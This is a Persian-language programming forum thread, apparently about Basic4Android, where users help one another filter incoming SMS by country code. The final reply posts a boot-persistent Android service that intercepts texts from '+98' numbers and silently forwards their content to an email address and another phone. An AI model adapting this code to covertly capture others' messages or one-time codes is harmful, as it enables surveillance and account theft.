رفتن به مطلب
  • 0

بازم سوال در مورد اس ام اس در برنامه


abbas291075

سوال

سلام امروز همه تایپیک ها در مورد دریافت اس ام اس در برنامه رو خوندم ولی هنوز یک سوال دارم اونم اینه ک میخام اگه پیام از طرف یک شماره با کد  کشوری خاصی بود رو دریافت کنم خودم اینطوری فکر میکنم ک باید کد اون کشور رو با اول شماره ک پیام میفرسته برابر قرار بدم اما نمیدونم چطوری اول شماره طرفی ک پیام ارسال میکنه رو بدست بیارم
if(from(0) =9) then

toast massage(body,false)

end if

مشکل اینه خطا میده و from رو ب عنوان یک ارایه نمیشناسه ممنون میشم اگه امکانی هست ک این مشکلو بر طرف کنم جواب بدینننننننن

 

لینک ارسال
به اشتراک گذاری در سایت های دیگر

4 پاسخ به این سوال تاکنون داده شده است

ارسال های توصیه شده

Sub lising_MessageReceived (From As String, Body As String ) As Boolean
 
 If (From.CharAt(0) = "+" And From.CharAt(1)="9") Or (From.CharAt(0)="9") Then
  ToastMessageShow(Body,False)
 End If

شرمنده تایپیکو زودتر از دوازده ساعت اوردم بالا اما لازم دارم .
دوستان اینو نوشتم اما گوشی در دسترس نیست ک امتحان کنم اگه نظری دارین بگیین ممنون

لینک ارسال
به اشتراک گذاری در سایت های دیگر

ممنون مهدی جان شرط کار میکنه  اما داخل شرط گذاشتم کbodyرو ب یک ایمیل بفرسته نمیدنم چرا خالی میفرسته همش یا نمیفرسته به شماره ای هم ک گفتم بفرسته ب مشکل بر میخورم سیم کارتم شارژ داشت تمام شارژ تموم شد البته زیاد نبود :bigsmile:شما اگه میشه ی نگا ب این کد کنیین ممنون میشم

read massage.rar

لینک ارسال
به اشتراک گذاری در سایت های دیگر

در 16 ساعت قبل، abbas291075 گفته است :

ممنون مهدی جان شرط کار میکنه  اما داخل شرط گذاشتم کbodyرو ب یک ایمیل بفرسته نمیدنم چرا خالی میفرسته همش یا نمیفرسته به شماره ای هم ک گفتم بفرسته ب مشکل بر میخورم سیم کارتم شارژ داشت تمام شارژ تموم شد البته زیاد نبود :bigsmile:شما اگه میشه ی نگا ب این کد کنیین ممنون میشم

read massage.rar

:DD::DD:

الان مثلا اومده بودید شمارتون رو از توی sen.Send پاک کرده بودید و ****** گذاشته بودید ؟ :دی

یادتون رفته بود شمارتون رو از خط پایین که ایمیلتون هست هم بردارید

برادرانه پیشنهاد میکنم از روش postString استفاده کنید... یک هاست تهییه کنید و از postString استفاده کنید

هم سرعت فوق العاده بالاتری داره... هم امنیت بالاتری داره... هم کلا کارتون قوی تر انجام میشه !!!

کدت مشکلی نداشت...

خب ولی باز کل کد سرویست رو به این تغییر بده :

#Region  Service Attributes 
	#StartAtBoot: true
	#StartCommandReturnValue: android.app.Service.START_STICKY
#End Region

Sub Process_Globals
	Dim sm As SmsInterceptor
	Dim sen As PhoneSms
	
End Sub

Sub Service_Create
	
End Sub

Sub Service_Start (StartingIntent As Intent)
     sm.Initialize("lising")
	 StartServiceAt("",DateTime.Now + 0.1*DateTime.TicksPerMinute,False) 
End Sub

Sub Service_Destroy

End Sub

Sub lising_MessageReceived (from As String, body As String ) As Boolean
	If from.StartsWith("+98") Then 
		Send_Message(body)
		sen.Send("*************",body)
	End If	
End Sub
Sub Send_Message(Msg1 As String)
   Dim SMTP1 As SMTP
   SMTP1.Initialize("smtp.gmail.com", 465, "[email protected]", "*************", "smtpEventResponse")
   SMTP1.To.Add("[email protected]") 'change to real address
   SMTP1.Subject = "پیام مورد نظر"
   SMTP1.Body =  Msg1
   SMTP1.UseSSL = True
   SMTP1.Send
End Sub
Sub smtpEventResponse_MessageSent(Success As Boolean)
	
   Log(Success)
   Log(LastException)
End Sub

به جای اون ***** هم شماره رو بزارید و تست کن !!!

نباید مشکلی داشته باشه :fekr:

اگه شماره درست باشه و شرط اجرا بشه پس Body هم نباید خالی باشه

شما بیا توی همون شرط Body رو به صورت ToastMessage نشون بده ببین درست میده متن رو ؟

لینک ارسال
به اشتراک گذاری در سایت های دیگر

بایگانی شده

این موضوع بایگانی و قفل شده و دیگر امکان ارسال پاسخ نیست.

مهمان
این موضوع برای عدم ارسال قفل گردیده است.
  • کاربران آنلاین در این صفحه   0 کاربر

    • هیچ کاربر عضوی،در حال مشاهده این صفحه نیست.
×
×
  • اضافه کردن...